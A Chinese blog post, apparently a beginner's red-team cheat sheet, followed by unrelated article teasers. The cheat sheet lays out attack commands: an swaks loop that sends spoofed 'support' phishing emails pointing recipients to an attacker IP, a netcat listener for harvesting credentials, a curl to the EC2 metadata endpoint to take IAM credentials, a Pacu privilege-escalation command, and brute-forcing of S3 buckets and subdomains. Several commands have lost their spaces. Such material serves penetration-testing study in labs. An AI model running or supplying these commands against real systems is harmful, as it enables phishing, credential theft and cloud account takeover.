news 2026/7/14 21:55:11

小白也能看懂系列——红队进攻

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
小白也能看懂系列——红队进攻

红队 - 攻击SMTP

  1. 信息收集 |Techniques: Nmap Scanning
nmap -sV -sC -v -p- --min-rate=10000<Target IP>
  1. 子域枚举 |Techniques: Using ffuf for subdomain Brute-Forcing
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://TargetDomain.com -H"Host: FUZZ.TargetDomain.com"
  1. 电子邮件收集 |Techniques: Extracting Email from Web Page
#Manually visit Target Domain / SubDomain and extract emails to mails.txt
  1. 电子邮件互动 |Techniques: Sending Emails with swaks
whilereadmail;doswaks --to$mail--from support@TargetDomain.com --header"Subject: Credentials"--body"goto http://10.10.14.4"--server 10.10.10.197;done<mails.txt
  1. 凭证收获 |Techniques: Netcat Listener
nc -lvp 80#to listen for incoming connections
  1. 访问SMTP |Techniques: Using evolution to Access SMTP
apt install evolution#and with Configure SMTP server 10.10.10.197 and email user@TargetDomain.com
  1. 探索已发送物品 |Techniques: Checking Sent Emails
#Check sent items for any useful information afther accessing the SMTP server

通过EC2元数据进行权限升级

方法一

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>
  • curl: 用于执行HTTP请求的命令行工具。
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>:元数据服务的URL端点,用于获取指定IAM角色的安全凭证。用IAM职位的名称替换<role_name>。

方法二

python3 pacu.py --method escalate_iam_roles --profile<aws_profile>--regions<aws_region>--instances<instance_id>
  • 在此命令中,pacu.py 脚本与该方法一起执行,该方法专门设计用于提升与 IAM 角色相关的权限。escalate_iam_roles
  • --profile选项指定用于认证的 AWS 配置文件。
  • --regions选项指定了要针对的AWS区域。
  • --instances选项用于指定将要升级IAM角色的目标EC2实例ID。

不安全的接口和API(面向云端)

方法一

python3 cloudhunter.py --write-test --open-only http://example.com
  • --write-test: 该选项告诉脚本写入测试文件。测试文件的目的和内容取决于 cloudhunter.py 脚本的实现方式。
  • --open-only:该选项指定脚本仅检查目标URL上的开放端口或服务,此时目标URL为 http://example.com。它表示脚本不会尝试执行任何其他类型的扫描或分析。
  • http://example.com: 这是脚本将对其进行开放端口检查的目标URL。在这个例子中,它被设置为 http://example.com,但在实际场景中,你通常会用你想测试的实际URL替换它。

方法二

cf enum<domain>
  • 通过用实际域名替换,命令会尝试使用 cf 枚举工具检索该域名的特定信息。收集的信息类型及呈现方式取决于所用工具的具体实现方式。<domain>

方法三

ffuf -w /path/to/seclists/Discovery/Web-Content/api.txt -u https://example.com/FUZZ -mc all
  • ffuf: 这是执行的工具或命令名称。
  • -w /path/to/seclists/Discovery/Web-Content/api.txt: 该选项指定用于模糊的单词表(-w)。wordlist 文件位于 /path/to/seclists/Discovery/Web-Content/api.txt,包含将针对目标 URL 进行测试的潜在输入值或负载列表。
  • -u https://example.com/FUZZ:该选项定义了模糊过程的目标URL(-u)。字符串 FUZZ 作为占位符,在模糊过程中会被单词列表中的值替换。此时目标URL为 https://example.com/FUZZ,FUZZ将被替换为单词列表中不同的负载。
  • -mc all: 该选项指定目标服务器响应的匹配条件(-mc)。在这种情况下,所有响应,无论 HTTP 状态码如何,都将被视为有效匹配。

方法4

php s3-buckets-bruteforcer.php --bucket gwen001-test002
  • 通过提供参数后加上特定值(gwen001-test002),脚本将尝试以该值为目标对亚马逊S3桶进行暴力破解。脚本很可能包含了遍历不同桶名称的逻辑,尝试每个,直到找到有效或可访问的桶。--bucket
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/3 15:59:14

HarmonyOS 应用开发实战:高精图像处理与头像裁剪持久化技术深度解析

摘要 在数字化转型中&#xff0c;用户交互界面&#xff08;UI&#xff09;的专业性与数据处理的精确性是应用成败的关键。本文将深入探讨在 HarmonyOS 平台上&#xff0c;如何为一款应用构建高标准的个人中心头像上传与裁剪系统。我们将从底层的 PixelMap 像素级操作讲起&…

作者头像 李华
网站建设 2026/7/3 12:21:08

新疆财经大学完成网站群全链条国产化改造

筑牢教育数字化安全底座近日&#xff0c;新疆财经大学网站群信创改造项目顺利落地&#xff0c;实现从底层运行环境到上层应用系统的全链条国产化替代&#xff0c;完成与国产操作系统、数据库、中间件的深度适配&#xff0c;摆脱国外商业软件依赖&#xff0c;构建起自主可控、安…

作者头像 李华
网站建设 2026/6/26 19:18:46

SSM毕设项目:基于JavaWeb的东北特色农产品电商后台管理系统的设计与开发(源码+文档,讲解、调试运行,定制等)

博主介绍&#xff1a;✌️码农一枚 &#xff0c;专注于大学生项目实战开发、讲解和毕业&#x1f6a2;文撰写修改等。全栈领域优质创作者&#xff0c;博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围&#xff1a;&am…

作者头像 李华
网站建设 2026/7/12 9:44:33

软件测试3大发展趋势,看看你都知道吗?

软件测试这个行业前景怎么样&#xff1f;小白入行的话会出现什么样的问题&#xff1f;遇到瓶颈怎么破&#xff1f;这一系列问题是很多在行业外观望的小白甚至是刚刚入行的萌新测试们都密切关注&#xff01; 毕竟这关系到自己未来的收入&#xff0c;甚至是决定自己的职业发展方…

作者头像 李华
网站建设 2026/7/12 11:09:33

一文750字教你性能测试报告怎么写

性能测试报告包含哪些内容 1.系统概述 2.测试目的范围与目标 测试目的 测试对象范围 测试指标范围 3.测试工具及环境 测试环境架构 性能测试环境 性能测试环境基本配置 测试工具 4.测试记录及结果分析 场景描述 测试结果数据 测试问题及结果分析 5.稳定性测试 …

作者头像 李华
网站建设 2026/7/12 11:09:32

告别权限混乱!cpolar帮助宝塔 FTP实现远程文件管理自由

宝塔 FTP 作为宝塔面板内置的文件管理模块&#xff0c;核心功能围绕文件传输、权限管控与操作日志展开&#xff0c;适配 Windows、Linux、Unix 等多系统&#xff0c;尤其适合中小企业、创业团队或个人站长使用&#xff0c;优点在于账号创建简单、权限配置灵活&#xff0c;还能精…

作者头像 李华